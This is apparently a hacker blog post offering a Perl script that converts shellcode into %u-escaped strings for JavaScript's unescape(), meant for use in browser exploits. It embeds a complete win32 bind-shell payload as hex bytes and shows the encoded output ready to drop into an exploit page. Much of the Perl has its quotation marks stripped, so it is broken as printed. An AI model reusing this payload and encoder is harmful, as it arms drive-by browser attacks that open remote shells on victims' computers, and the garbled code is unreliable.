With all of the recent browser exploits, I wanted an easy way to encode my shellcode. Now this is not polished by any means and I took the function that encodes it(so don’t give me any credit). It was actually developed by Aviv Raff and H D Moore from the Mozilla_Compareto exploit.

Some improvements I would like to do is make the encoded shellcode output a little cleaner and I would like to read the shellcode from a file. As it stands now you have to copy your shellcode into the perl script as a var.

So to do this, write your shellcode or just go to
http://metasploit.com:55555/PAYLOADS
and pick the payload you would want to use. paste into the perl script. (below example is a w32_Bind payload)

#! /usr/local/bin/perl
use strict;
 
#paste your shellcode below
my $shellcode=\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7f.\x3c\x79\x76\x83\xeb\xfc\xe2\xf4\x97\x6a\x79\x76\x7f\x6f\x2c\x20.\x28\xb7\x15\x52\x67\xb7\x3c\x4a\xf4\x68\x7c\x0e\x7e\xd6\xf2\x3c.\x67\xb7\x23\x56\x7e\xd7\x9a\x44\x36\xb7\x4d\xfd\x7e\xd2\x48\x89.\x83\x0d\xb9\xda\x47\xdc\x0d\x71\xbe\xf3\x74\x77\xb8\xd7\x8b\x4d.\x03\x18\x6d\x03\x9e\xb7\x23\x52\x7e\xd7\x1f\xfd\x73\x77\xf2\x2c.\x63\x3d\x92\xfd\x7b\xb7\x78\x9e\x94\x3e\x48\xb6\x20\x62\x24\x2d.\xbd\x34\x79\x28\x15\x0c\x20\x12\xf4\x25\xf2\x2d\x73\xb7\x22\x6a.\xf4\x27\xf2\x2d\x77\x6f\x11\xf8\x31\x32\x95\x89\xa9\xb5\xbe\xf7.\x93\x3c\x78\x76\x7f\x6b\x2f\x25\xf6\xd9\x91\x51\x7f\x3c\x79\xe6.\x7e\x3c\x79\xc0\x66\x24\x9e\xd2\x66\x4c\x90\x93\x36\xba\x30\xd2.\x65\x4c\xbe\xd2\xd2\x12\x90\xaf\x76\xc9\xd4\xbd\x92\xc0\x42\x21.\x2c\x0e\x26\x45\x4d\x3c\x22\xfb\x34\x1c\x28\x89\xa8\xb5\xa6\xff.\xbc\xb1\x0c\x62\x15\x3b\x20\x27\x2c\xc3\x4d\xf9\x80\x69\x7d\x2f.\xf6\x38\xf7\x94\x8d\x17\x5e\x22\x80\x0b\x86\x23\x4f\x0d\xb9\x26.\x2f\x6c\x29\x36\x2f\x7c\x29\x89\x2a\x10\xf0\xb1\x4e\xe7\x2a\x25.\x17\x3e\x79\x67\x23\xb5\x99\x1c\x6f\x6c\x2e\x89\x2a\x18\x2a\x21.\x80\x69\x51\x25\x2b\x6b\x86\x23\x5f\xb5\xbe\xf7\x93\x3c\x69\x76.\x7f\xb5\x9a\x1c\x7f\x54\x79\x66\x7f\x3c\x2a\x21\x80\x69\x61\xf7.\x93\x3c\x7d\x76\x7f\xc3\xaa\x76;
 
JSUnescape($shellcode);
 
sub JSUnescape #Taken from Mozilla_Compareto by Aviv Raff and H D Moore
{
my $data = shift;
my $code =;
 
# Encode the shellcode via %u sequences for JS’s unescape() function
my $idx = 0;
while ($idx < length($data) - 1) {
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1));
$code .= sprintf(%%u%.2x%.2x’, $c2, $c1);
$idx += 2;
}
 
print\n. $code .\n;
}

Output should look like the following. All ready for unescape()!

uc92b%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u7f13%u793c%u8376%ufceb%uf4e2%u6a97%u7679%u6f7f
%u202c%ub728%u5215%ub767%u4a3c%u68f4%u0e7c%ud67e%u3cf2%ub767%u5623%ud77e%u449a%ub736%ufd4d
%ud27e%u8948%u0d83%udab9%udc47%u710d%uf3be%u7774%ud7b8%u4d8b%u1803%u036d%ub79e%u5223%ud77e
%ufd1f%u7773%u2cf2%u3d63%ufd92%ub77b%u9e78%u3e94%ub648%u6220%u2d24%u34bd%u2879%u0c15%u1220
%u25f4%u2df2%ub773%u6a22%u27f4%u2df2%u6f77%uf811%u3231%u8995%ub5a9%uf7be%u3c93%u7678%u6b7f
%u252f%ud9f6%u5191%u3c7f%ue679%u3c7e%uc079%u2466%ud29e%u4c66%u9390%uba36%ud230%u4c65%ud2be
%u12d2%uaf90%uc976%ubdd4%uc092%u2142%u0e2c%u4526%u3c4d%ufb22%u1c34%u8928%ub5a8%uffa6%ub1bc
%u620c%u3b15%u2720%uc32c%uf94d%u6980%u2f7d%u38f6%u94f7%u178d%u225e%u0b80%u2386%u0d4f%u26b9
%u6c2f%u3629%u7c2f%u8929%u102a%ub1f0%ue74e%u252a%u3e17%u6779%ub523%u1c99%u6c6f%u892e%u182a
%u212a%u6980%u2551%u6b2b%u2386%ub55f%uf7be%u3c93%u7669%ub57f%u1c9a%u547f%u6679%u3c7f%u212a
%u6980%uf761%u3c93%u767d%uc37f%u76aa